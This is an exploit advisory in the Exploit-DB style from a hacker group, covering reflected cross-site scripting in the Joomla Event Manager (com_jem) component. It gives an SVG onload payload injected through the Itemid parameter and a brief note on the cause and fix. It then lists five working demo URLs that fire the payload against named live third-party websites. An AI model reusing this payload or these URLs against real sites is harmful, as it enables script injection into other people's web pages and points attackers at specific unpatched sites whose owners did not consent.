######################
# Exploit Title : Joomla Event Manager (com_jem) - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.joomlaeventmanager.net/download
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 2.x
# Date: 2016/05/11
######################
#
# PoC:
# Itemid=[XSS]
# Payload = ">Persian<svg/onload=confirm(/MobhaM/)>Hack Team
# Note: judging by the leading "> in the payload, the Itemid value appears to be
# reflected into an HTML attribute without output encoding (reflected XSS).
# Itemid is a numeric menu-item id, so casting it to an integer on input and
# HTML-escaping it on output would close the issue.
# Demo :
# https://www.msuhillel.org/index.php?option=com_jem&view=eventslist&Itemid=293%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&limitstart=10
# http://fineartbazar.ir/portal/index.php?option=com_jem&view=venue&id=22:2015-01-05-09-15-50&Itemid=465%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.prestodigitators.com/index.php?view=eventslist&task=archive&option=com_jem&Itemid=562%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.degrootdiervoeders.nl/index.php?option=com_jem&view=eventslist&Itemid=145%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.kuhlo-realschule.de/index.php?option=com_jem&view=eventslist&task=archive&Itemid=72%20%20%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Greetz : Milad Hacking & FireKernel And All Persian Hack Team Members
# Homepage : persian-team.ir
######################